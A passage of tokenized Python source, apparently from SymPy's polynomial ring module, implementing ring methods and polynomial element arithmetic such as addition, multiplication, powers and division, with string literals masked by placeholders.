<EOL> elif expr . is_Mul : <EOL> return reduce ( mul , list ( map ( _rebuild , expr . args ) ) ) <EOL> elif expr . is_Pow and expr . exp . is_Integer and expr . exp >= <NUM_LIT:0> : <EOL> return _rebuild ( expr . base ) ** int ( expr . exp ) <EOL> else : <EOL> return domain . convert ( expr ) <EOL> return _rebuild ( sympify ( expr ) ) <EOL> def from_expr ( self , expr ) : <EOL> mapping = dict ( list ( zip ( self . symbols , self . gens ) ) ) <EOL> try : <EOL> poly = self . _rebuild_expr ( expr , mapping ) <EOL> except CoercionFailed : <EOL> raise ValueError ( "<STR_LIT>" % ( self , expr ) ) <EOL> else : <EOL> return self . ring_new ( poly ) <EOL> def index ( self , gen ) : <EOL> """<STR_LIT>""" <EOL> if gen is None : <EOL> i = <NUM_LIT:0> <EOL> elif isinstance ( gen , int ) : <EOL> i = gen <EOL> if <NUM_LIT:0> <= i and i < self . ngens : <EOL> pass <EOL> elif - self . ngens <= i and i <= - <NUM_LIT:1> : <EOL> i = - i - <NUM_LIT:1> <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> elif isinstance ( gen , self . dtype ) : <EOL> try : <EOL> i = self . gens . index ( gen ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> elif isinstance ( gen , string_types ) : <EOL> try : <EOL> i = self . symbols . index ( gen ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> return i <EOL> def drop ( self , * gens ) : <EOL> """<STR_LIT>""" <EOL> indices = set ( map ( self . index , gens ) ) <EOL> symbols = [ s for i , s in enumerate ( self . symbols ) if i not in indices ] <EOL> if not symbols : <EOL> return self . domain <EOL> else : <EOL> return self . clone ( symbols = symbols ) <EOL> def __getitem__ ( self , key ) : <EOL> symbols = self . symbols [ key ] <EOL> if not symbols : <EOL> return self . domain <EOL> else : <EOL> return self . clone ( symbols = symbols ) <EOL> def to_ground ( self ) : <EOL> if self . domain . is_Composite or hasattr ( self . domain , '<STR_LIT>' ) : <EOL> return self . clone ( domain = self . domain . domain ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . domain ) <EOL> def to_domain ( self ) : <EOL> return PolynomialRing ( self ) <EOL> def to_field ( self ) : <EOL> from sympy . polys . fields import FracField <EOL> return FracField ( self . symbols , self . domain , self . order ) <EOL> @ property <EOL> def is_univariate ( self ) : <EOL> return len ( self . gens ) == <NUM_LIT:1> <EOL> @ property <EOL> def is_multivariate ( self ) : <EOL> return len ( self . gens ) > <NUM_LIT:1> <EOL> def add ( self , * objs ) : <EOL> """<STR_LIT>""" <EOL> p = self . zero <EOL> for obj in objs : <EOL> if is_sequence ( obj , include = GeneratorType ) : <EOL> p += self . add ( * obj ) <EOL> else : <EOL> p += obj <EOL> return p <EOL> def mul ( self , * objs ) : <EOL> """<STR_LIT>""" <EOL> p = self . one <EOL> for obj in objs : <EOL> if is_sequence ( obj , include = GeneratorType ) : <EOL> p *= self . mul ( * obj ) <EOL> else : <EOL> p *= obj <EOL> return p <EOL> def drop_to_ground ( self , * gens ) : <EOL> r"""<STR_LIT>""" <EOL> indices = set ( map ( self . index , gens ) ) <EOL> symbols = [ s for i , s in enumerate ( self . symbols ) if i not in indices ] <EOL> gens = [ gen for i , gen in enumerate ( self . gens ) if i not in indices ] <EOL> if not symbols : <EOL> return self <EOL> else : <EOL> return self . clone ( symbols = symbols , domain = self . drop ( * gens ) ) <EOL> def compose ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self != other : <EOL> syms = set ( self . symbols ) . union ( set ( other . symbols ) ) <EOL> return self . clone ( symbols = list ( syms ) ) <EOL> else : <EOL> return self <EOL> def add_gens ( self , symbols ) : <EOL> """<STR_LIT>""" <EOL> syms = set ( self . symbols ) . union ( set ( symbols ) ) <EOL> return self . clone ( symbols = list ( syms ) ) <EOL> class PolyElement ( DomainElement , DefaultPrinting , CantSympify , dict ) : <EOL> """<STR_LIT>""" <EOL> def new ( self , init ) : <EOL> return self . __class__ ( init ) <EOL> def parent ( self ) : <EOL> return self . ring . to_domain ( ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . ring , list ( self . iterterms ( ) ) ) <EOL> _hash = None <EOL> def __hash__ ( self ) : <EOL> _hash = self . _hash <EOL> if _hash is None : <EOL> self . _hash = _hash = hash ( ( self . ring , frozenset ( self . items ( ) ) ) ) <EOL> return _hash <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . new ( self ) <EOL> def set_ring ( self , new_ring ) : <EOL> if self . ring == new_ring : <EOL> return self <EOL> elif self . ring . symbols != new_ring . symbols : <EOL> terms = list ( zip ( * _dict_reorder ( self , self . ring . symbols , new_ring . symbols ) ) ) <EOL> return new_ring . from_terms ( terms ) <EOL> else : <EOL> return new_ring . from_dict ( self ) <EOL> def as_expr ( self , * symbols ) : <EOL> if symbols and len ( symbols ) != self . ring . ngens : <EOL> raise ValueError ( "<STR_LIT>" % ( self . ring . ngens , len ( symbols ) ) ) <EOL> else : <EOL> symbols = self . ring . symbols <EOL> return expr_from_dict ( self . as_expr_dict ( ) , * symbols ) <EOL> def as_expr_dict ( self ) : <EOL> to_sympy = self . ring . domain . to_sympy <EOL> return { monom : to_sympy ( coeff ) for monom , coeff in self . iterterms ( ) } <EOL> def clear_denoms ( self ) : <EOL> domain = self . ring . domain <EOL> if not domain . has_Field or not domain . has_assoc_Ring : <EOL> return domain . one , self <EOL> ground_ring = domain . get_ring ( ) <EOL> common = ground_ring . one <EOL> lcm = ground_ring . lcm <EOL> denom = domain . denom <EOL> for coeff in self . values ( ) : <EOL> common = lcm ( common , denom ( coeff ) ) <EOL> poly = self . new ( [ ( k , v * common ) for k , v in self . items ( ) ] ) <EOL> return common , poly <EOL> def strip_zero ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in list ( self . items ( ) ) : <EOL> if not v : <EOL> del self [ k ] <EOL> def __eq__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return not p1 <EOL> elif isinstance ( p2 , p1 . ring . dtype ) : <EOL> return dict . __eq__ ( p1 , p2 ) <EOL> elif len ( p1 ) > <NUM_LIT:1> : <EOL> return False <EOL> else : <EOL> return p1 . get ( p1 . ring . zero_monom ) == p2 <EOL> def __ne__ ( p1 , p2 ) : <EOL> return not p1 . __eq__ ( p2 ) <EOL> def almosteq ( p1 , p2 , tolerance = None ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> if set ( p1 . keys ( ) ) != set ( p2 . keys ( ) ) : <EOL> return False <EOL> almosteq = ring . domain . almosteq <EOL> for k in p1 . keys ( ) : <EOL> if not almosteq ( p1 [ k ] , p2 [ k ] , tolerance ) : <EOL> return False <EOL> else : <EOL> return True <EOL> elif len ( p1 ) > <NUM_LIT:1> : <EOL> return False <EOL> else : <EOL> try : <EOL> p2 = ring . domain . convert ( p2 ) <EOL> except CoercionFailed : <EOL> return False <EOL> else : <EOL> return ring . domain . almosteq ( p1 . const ( ) , p2 , tolerance ) <EOL> def sort_key ( self ) : <EOL> return ( len ( self ) , self . terms ( ) ) <EOL> def _cmp ( p1 , p2 , op ) : <EOL> if isinstance ( p2 , p1 . ring . dtype ) : <EOL> return op ( p1 . sort_key ( ) , p2 . sort_key ( ) ) <EOL> else : <EOL> return NotImplemented <EOL> def __lt__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , lt ) <EOL> def __le__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , le ) <EOL> def __gt__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , gt ) <EOL> def __ge__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , ge ) <EOL> def _drop ( self , gen ) : <EOL> ring = self . ring <EOL> i = ring . index ( gen ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> return i , ring . domain <EOL> else : <EOL> symbols = list ( ring . symbols ) <EOL> del symbols [ i ] <EOL> return i , ring . clone ( symbols = symbols ) <EOL> def drop ( self , gen ) : <EOL> i , ring = self . _drop ( gen ) <EOL> if self . ring . ngens == <NUM_LIT:1> : <EOL> if self . is_ground : <EOL> return self . coeff ( <NUM_LIT:1> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> else : <EOL> poly = ring . zero <EOL> for k , v in self . items ( ) : <EOL> if k [ i ] == <NUM_LIT:0> : <EOL> K = list ( k ) <EOL> del K [ i ] <EOL> poly [ tuple ( K ) ] = v <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> return poly <EOL> def _drop_to_ground ( self , gen ) : <EOL> ring = self . ring <EOL> i = ring . index ( gen ) <EOL> symbols = list ( ring . symbols ) <EOL> del symbols [ i ] <EOL> return i , ring . clone ( symbols = symbols , domain = ring [ i ] ) <EOL> def drop_to_ground ( self , gen ) : <EOL> if self . ring . ngens == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> i , ring = self . _drop_to_ground ( gen ) <EOL> poly = ring . zero <EOL> gen = ring . domain . gens [ <NUM_LIT:0> ] <EOL> for monom , coeff in self . iterterms ( ) : <EOL> mon = monom [ : i ] + monom [ i + <NUM_LIT:1> : ] <EOL> if not mon in poly : <EOL> poly [ mon ] = ( gen ** monom [ i ] ) . mul_ground ( coeff ) <EOL> else : <EOL> poly [ mon ] += ( gen ** monom [ i ] ) . mul_ground ( coeff ) <EOL> return poly <EOL> def to_dense ( self ) : <EOL> return dmp_from_dict ( self , self . ring . ngens - <NUM_LIT:1> , self . ring . domain ) <EOL> def to_dict ( self ) : <EOL> return dict ( self ) <EOL> def str ( self , printer , precedence , exp_pattern , mul_symbol ) : <EOL> if not self : <EOL> return printer . _print ( self . ring . domain . zero ) <EOL> prec_add = precedence [ "<STR_LIT>" ] <EOL> prec_mul = precedence [ "<STR_LIT>" ] <EOL> prec_atom = precedence [ "<STR_LIT>" ] <EOL> ring = self . ring <EOL> symbols = ring . symbols <EOL> ngens = ring . ngens <EOL> zm = ring . zero_monom <EOL> sexpvs = [ ] <EOL> for expv , coeff in self . terms ( ) : <EOL> positive = ring . domain . is_positive ( coeff ) <EOL> sign = "<STR_LIT>" if positive else "<STR_LIT>" <EOL> sexpvs . append ( sign ) <EOL> if expv == zm : <EOL> scoeff = printer . _print ( coeff ) <EOL> if scoeff . startswith ( "<STR_LIT:->" ) : <EOL> scoeff = scoeff [ <NUM_LIT:1> : ] <EOL> else : <EOL> if not positive : <EOL> coeff = - coeff <EOL> if coeff != <NUM_LIT:1> : <EOL> scoeff = printer . parenthesize ( coeff , prec_mul , strict = True ) <EOL> else : <EOL> scoeff = '<STR_LIT>' <EOL> sexpv = [ ] <EOL> for i in range ( ngens ) : <EOL> exp = expv [ i ] <EOL> if not exp : <EOL> continue <EOL> symbol = printer . parenthesize ( symbols [ i ] , prec_atom , strict = True ) <EOL> if exp != <NUM_LIT:1> : <EOL> if exp != int ( exp ) or exp < <NUM_LIT:0> : <EOL> sexp = printer . parenthesize ( exp , prec_atom , strict = False ) <EOL> else : <EOL> sexp = exp <EOL> sexpv . append ( exp_pattern % ( symbol , sexp ) ) <EOL> else : <EOL> sexpv . append ( '<STR_LIT:%s>' % symbol ) <EOL> if scoeff : <EOL> sexpv = [ scoeff ] + sexpv <EOL> sexpvs . append ( mul_symbol . join ( sexpv ) ) <EOL> if sexpvs [ <NUM_LIT:0> ] in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> head = sexpvs . pop ( <NUM_LIT:0> ) <EOL> if head == "<STR_LIT>" : <EOL> sexpvs . insert ( <NUM_LIT:0> , "<STR_LIT:->" ) <EOL> return "<STR_LIT>" . join ( sexpvs ) <EOL> @ property <EOL> def is_generator ( self ) : <EOL> return self in self . ring . _gens_set <EOL> @ property <EOL> def is_ground ( self ) : <EOL> return not self or ( len ( self ) == <NUM_LIT:1> and self . ring . zero_monom in self ) <EOL> @ property <EOL> def is_monomial ( self ) : <EOL> return not self or ( len ( self ) == <NUM_LIT:1> and self . LC == <NUM_LIT:1> ) <EOL> @ property <EOL> def is_term ( self ) : <EOL> return len ( self ) <= <NUM_LIT:1> <EOL> @ property <EOL> def is_negative ( self ) : <EOL> return self . ring . domain . is_negative ( self . LC ) <EOL> @ property <EOL> def is_positive ( self ) : <EOL> return self . ring . domain . is_positive ( self . LC ) <EOL> @ property <EOL> def is_nonnegative ( self ) : <EOL> return self . ring . domain . is_nonnegative ( self . LC ) <EOL> @ property <EOL> def is_nonpositive ( self ) : <EOL> return self . ring . domain . is_nonpositive ( self . LC ) <EOL> @ property <EOL> def is_zero ( f ) : <EOL> return not f <EOL> @ property <EOL> def is_one ( f ) : <EOL> return f == f . ring . one <EOL> @ property <EOL> def is_monic ( f ) : <EOL> return f . ring . domain . is_one ( f . LC ) <EOL> @ property <EOL> def is_primitive ( f ) : <EOL> return f . ring . domain . is_one ( f . content ( ) ) <EOL> @ property <EOL> def is_linear ( f ) : <EOL> return all ( sum ( monom ) <= <NUM_LIT:1> for monom in f . itermonoms ( ) ) <EOL> @ property <EOL> def is_quadratic ( f ) : <EOL> return all ( sum ( monom ) <= <NUM_LIT:2> for monom in f . itermonoms ( ) ) <EOL> @ property <EOL> def is_squarefree ( f ) : <EOL> return f . ring . dmp_sqf_p ( f ) <EOL> @ property <EOL> def is_irreducible ( f ) : <EOL> return f . ring . dmp_irreducible_p ( f ) <EOL> @ property <EOL> def is_cyclotomic ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_cyclotomic_p ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def __neg__ ( self ) : <EOL> return self . new ( [ ( monom , - coeff ) for monom , coeff in self . iterterms ( ) ] ) <EOL> def __pos__ ( self ) : <EOL> return self <EOL> def __add__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return p1 . copy ( ) <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> p = p1 . copy ( ) <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> for k , v in p2 . items ( ) : <EOL> v = get ( k , zero ) + v <EOL> if v : <EOL> p [ k ] = v <EOL> else : <EOL> del p [ k ] <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __radd__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> cp2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = p1 . copy ( ) <EOL> if not cp2 : <EOL> return p <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys ( ) : <EOL> p [ zm ] = cp2 <EOL> else : <EOL> if p2 == - p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] += cp2 <EOL> return p <EOL> def __radd__ ( p1 , n ) : <EOL> p = p1 . copy ( ) <EOL> if not n : <EOL> return p <EOL> ring = p1 . ring <EOL> try : <EOL> n = ring . domain_new ( n ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys ( ) : <EOL> p [ zm ] = n <EOL> else : <EOL> if n == - p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] += n <EOL> return p <EOL> def __sub__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return p1 . copy ( ) <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> p = p1 . copy ( ) <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> for k , v in p2 . items ( ) : <EOL> v = get ( k , zero ) - v <EOL> if v : <EOL> p [ k ] = v <EOL> else : <EOL> del p [ k ] <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rsub__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = p1 . copy ( ) <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys ( ) : <EOL> p [ zm ] = - p2 <EOL> else : <EOL> if p2 == p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] -= p2 <EOL> return p <EOL> def __rsub__ ( p1 , n ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> try : <EOL> n = ring . domain_new ( n ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = ring . zero <EOL> for expv in p1 : <EOL> p [ expv ] = - p1 [ expv ] <EOL> p += n <EOL> return p <EOL> def __mul__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p1 or not p2 : <EOL> return p <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> p2it = list ( p2 . items ( ) ) <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> for exp2 , v2 in p2it : <EOL> exp = monomial_mul ( exp1 , exp2 ) <EOL> p [ exp ] = get ( exp , zero ) + v1 * v2 <EOL> p . strip_zero ( ) <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rmul__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> v = v1 * p2 <EOL> if v : <EOL> p [ exp1 ] = v <EOL> return p <EOL> def __rmul__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> p = p1 . ring . zero <EOL> if not p2 : <EOL> return p <EOL> try : <EOL> p2 = p . ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> v = p2 * v1 <EOL> if v : <EOL> p [ exp1 ] = v <EOL> return p <EOL> def __pow__ ( self , n ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> if not n : <EOL> if self : <EOL> return ring . one <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif len ( self ) == <NUM_LIT:1> : <EOL> monom , coeff = list ( self . items ( ) ) [ <NUM_LIT:0> ] <EOL> p = ring . zero <EOL> if coeff == <NUM_LIT:1> : <EOL> p [ ring . monomial_pow ( monom , n ) ] = coeff <EOL> else : <EOL> p [ ring . monomial_pow ( monom , n ) ] = coeff ** n <EOL> return p <EOL> n = int ( n ) <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif n == <NUM_LIT:1> : <EOL> return self . copy ( ) <EOL> elif n == <NUM_LIT:2> : <EOL> return self . square ( ) <EOL> elif n == <NUM_LIT:3> : <EOL> return self * self . square ( ) <EOL> elif len ( self ) <= <NUM_LIT:5> : <EOL> return self . _pow_multinomial ( n ) <EOL> else : <EOL> return self . _pow_generic ( n ) <EOL> def _pow_generic ( self , n ) : <EOL> p = self . ring . one <EOL> c = self <EOL> while True : <EOL> if n & <NUM_LIT:1> : <EOL> p = p * c <EOL> n -= <NUM_LIT:1> <EOL> if not n : <EOL> break <EOL> c = c . square ( ) <EOL> n = n // <NUM_LIT:2> <EOL> return p <EOL> def _pow_multinomial ( self , n ) : <EOL> multinomials = list ( multinomial_coefficients ( len ( self ) , n ) . items ( ) ) <EOL> monomial_mulpow = self . ring . monomial_mulpow <EOL> zero_monom = self . ring . zero_monom <EOL> terms = list ( self . iterterms ( ) ) <EOL> zero = self . ring . domain . zero <EOL> poly = self . ring . zero <EOL> for multinomial , multinomial_coeff in multinomials : <EOL> product_monom = zero_monom <EOL> product_coeff = multinomial_coeff <EOL> for exp , ( monom , coeff ) in zip ( multinomial , terms ) : <EOL> if exp : <EOL> product_monom = monomial_mulpow ( product_monom , monom , exp ) <EOL> product_coeff *= coeff ** exp <EOL> monom = tuple ( product_monom ) <EOL> coeff = product_coeff <EOL> coeff = poly . get ( monom , zero ) + coeff <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> return poly <EOL> def square ( self ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> p = ring . zero <EOL> get = p . get <EOL> keys = list ( self . keys ( ) ) <EOL> zero = ring . domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> for i in range ( len ( keys ) ) : <EOL> k1 = keys [ i ] <EOL> pk = self [ k1 ] <EOL> for j in range ( i ) : <EOL> k2 = keys [ j ] <EOL> exp = monomial_mul ( k1 , k2 ) <EOL> p [ exp ] = get ( exp , zero ) + pk * self [ k2 ] <EOL> p = p . imul_num ( <NUM_LIT:2> ) <EOL> get = p . get <EOL> for k , v in self . items ( ) : <EOL> k2 = monomial_mul ( k , k ) <EOL> p [ k2 ] = get ( k2 , zero ) + v ** <NUM_LIT:2> <EOL> p . strip_zero ( ) <EOL> return p <EOL> def __divmod__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> return p1 . div ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rdivmod__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return ( p1 . quo_ground ( p2 ) , p1 . rem_ground ( p2 ) ) <EOL> def __rdivmod__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> def __mod__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> return p1 . rem ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rmod__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return p1 . rem_ground ( p2 ) <EOL> def __rmod__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> def __truediv__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> if p2 . is_monomial : <EOL> return p1 * ( p2 ** ( - <NUM_LIT:1> ) ) <EOL> else : <EOL> return p1 . quo ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rtruediv__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return p1 . quo_ground ( p2 ) <EOL> def __rtruediv__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> __floordiv__ = __div__ = __truediv__ <EOL> __rfloordiv__ = __rdiv__ = __rtruediv__ <EOL> def _term_div ( self ) : <EOL> zm = self . ring . zero_monom <EOL> domain = self . ring . domain <EOL> domain_quo = domain . quo <EOL> monomial_div = self . ring . monomial_div <EOL> if domain . has_Field : <EOL> def term_div ( a_lm_a_lc , b_lm_b_lc ) : <EOL> a_lm , a_lc = a_lm_a_lc <EOL> b_lm , b_lc = b_lm_b_lc <EOL> if b_lm == zm : <EOL> monom = a_lm <EOL> else : <EOL> monom = monomial_div ( a_lm , b_lm ) <EOL> if monom is not None : <EOL> return monom , domain_quo ( a_lc , b_lc ) <EOL> else : <EOL> return None <EOL> else : <EOL> def term_div ( a_lm_a_lc , b_lm_b_lc ) : <EOL> a_lm , a_lc = a_lm_a_lc <EOL> b_lm , b_lc = b_lm_b_lc <EOL> if b_lm == zm : <EOL> monom = a_lm <EOL> else : <EOL> monom = monomial_div ( a_lm , b_lm ) <EOL> if not ( monom is None or a_lc % b_lc ) : <EOL> return monom , domain_quo ( a_lc , b_lc ) <EOL> else : <EOL> return None <EOL> return term_div <EOL> def div ( self , fv ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> domain = ring . domain <EOL> ret_single = False <EOL> if isinstance ( fv , PolyElement ) : <EOL> ret_single = True <EOL> fv = [ fv ] <EOL> if any ( not f for f in fv ) : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> if not self : <EOL> if ret_single : <EOL> return ring . zero , ring . zero <EOL> else : <EOL> return [ ] , ring . zero <EOL> for f in fv : <EOL> if f . ring != ring : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> s = len ( fv ) <EOL> qv = [ ring . zero for i in range ( s ) ] <EOL> p = self . copy ( ) <EOL> r = ring . zero <EOL> term_div = self . _term_div ( ) <EOL> expvs = [ fx . leading_expv ( ) for fx in fv ] <EOL> while p : <EOL> i = <NUM_LIT:0> <EOL> divoccurred = <NUM_LIT:0> <EOL> while i < s and divoccurred == <NUM_LIT:0> : <EOL> expv = p . leading_expv ( ) <EOL> term = term_div ( ( expv , p [ expv ] ) , ( expvs [ i ] , fv [ i ] [ expvs [ i ] ] ) ) <EOL> if term is not None : <EOL> expv1 , c = term <EOL> qv [ i ] = qv [ i ] . _iadd_monom ( ( expv1 , c ) ) <EOL> p = p . _iadd_poly_monom ( fv [ i ] , ( expv1 , - c ) ) <EOL> divoccurred = <NUM_LIT:1> <EOL> else : <EOL> i += <NUM_LIT:1> <EOL> if not divoccurred : <EOL> expv = p . leading_expv ( ) <EOL> r = r . _iadd_monom ( ( expv , p [ expv ] ) ) <EOL> del p [ expv ] <EOL> if expv == ring . zero_monom : <EOL> r += p <EOL> if ret_single : <EOL> if not qv : <EOL> return ring . zero , r <EOL> else : <EOL> return qv [ <NUM_LIT:0> ] , r <EOL> else : <EOL> return qv , r <EOL> def rem ( self , G ) : <EOL> f = self <EOL> if isinstance ( G , PolyElement ) : <EOL> G = [ G ] <EOL> if any ( not g for g in G ) : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> ring = f . ring <EOL> domain = ring . domain <EOL> order = ring . order <EOL> zero = domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> r = ring . zero <EOL> term_div = f . _term_div ( ) <EOL> ltf = f . LT <EOL> f = f . copy ( ) <EOL> get = f . get <EOL> while f : <EOL> for g in G : <EOL> tq = term_div ( ltf , g . LT ) <EOL> if tq is not None : <EOL> m , c = tq <EOL> for mg , cg in g . iterterms ( ) : <EOL> m1 = monomial_mul ( mg , m ) <EOL> c1 = get ( m1 , zero ) - c * cg <EOL> if not c1 : <EOL> del f [ m1 ] <EOL> else : <EOL> f [ m1 ] = c1 <EOL> ltm = f . leading_expv ( ) <EOL> if ltm is not None : <EOL> ltf = ltm , f [ ltm ] <EOL> break <EOL> else : <EOL> ltm , ltc = ltf <EOL> if ltm in r : <EOL> r [ ltm ] += ltc <EOL> else : <EOL> r [ ltm ] = ltc <EOL> del f [ ltm ] <EOL> ltm = f . leading_expv ( ) <EOL> if ltm is not None : <EOL> ltf = ltm , f [ ltm ] <EOL> return r <EOL> def quo ( f , G ) : <EOL> return f . div ( G ) [ <NUM_LIT:0> ] <EOL> def exquo ( f , G ) : <EOL> q , r = f . div ( G ) <EOL> if not r : <EOL> return q <EOL> else : <EOL> raise ExactQuotientFailed ( f , G ) <EOL> def _iadd_monom ( self , mc ) : <EOL> """<STR_LIT>""" <EOL> if self in self . ring . _gens_set : <EOL> cpself = self . copy ( ) <EOL> else : <EOL> cpself = self <EOL> expv , coeff = mc <EOL> c = cpself . get ( expv ) <EOL> if c is None : <EOL> cpself [ expv ] = coeff <EOL> else : <EOL> c += coeff <EOL> if c : <EOL> cpself [ expv ] = c <EOL> else : <EOL> del cpself [ expv ] <EOL> return cpself <EOL> def _iadd_poly_monom ( self , p2 , mc ) : <EOL> """<STR_LIT>""" <EOL> p1 = self <EOL> if p1 in p1 . ring . _gens_set : <EOL> p1 = p1 . copy ( ) <EOL> ( m , c ) = mc <EOL> get = p1 . get <EOL> zero = p1 . ring . domain . zero <EOL> monomial_mul = p1 . ring . monomial_mul <EOL> for k , v in 